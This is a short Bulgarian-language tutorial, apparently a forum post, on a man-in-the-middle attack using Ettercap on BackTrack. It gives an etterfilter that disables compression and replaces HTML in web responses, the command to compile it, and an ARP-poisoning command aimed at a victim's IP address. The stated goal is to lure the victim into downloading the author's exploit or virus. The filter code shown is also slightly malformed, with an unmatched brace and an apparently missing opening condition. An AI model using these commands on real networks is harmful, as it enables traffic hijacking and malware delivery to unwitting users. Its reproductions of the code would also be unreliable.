Здравейте ще ви запозная с още една MITM атака .. За целта ползваме отново BackTrack дестрибуцията и Ettercap , като към него създаваме специален плугин заместващ HTML код. Така сърфиращата жертва лесно можете да я прилъжете да дръпне някой ваш експлойт или вирус.
Създаване на плугина:
- Създавате smb.filter файл със съдържание:
if(search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("zapped Accept-Encoding!\n");
}
}
if(ip.proto == TCP && tcp.src == 80) {
replace("html код за заместване ", "нов html код");
replace("html код за замесване", "нов html код");
msg("Filter Ran.\n");
}
Пример:
2. Компилиране на файла - etterfilter smb.filter -o smb.ef
След компилирането изхода трябва да е такъв или подобен:
-> Script encoded into 16 instructions.
3. Стартиране на Ettercap-a
ettercap -T -q -F smb.ef -M ARP /[ипто на жертвата]/ // -P autoadd -i waln0
Практически с тези операции можете да подмените всякакъв html код на жертвата.
Приятно тестване!
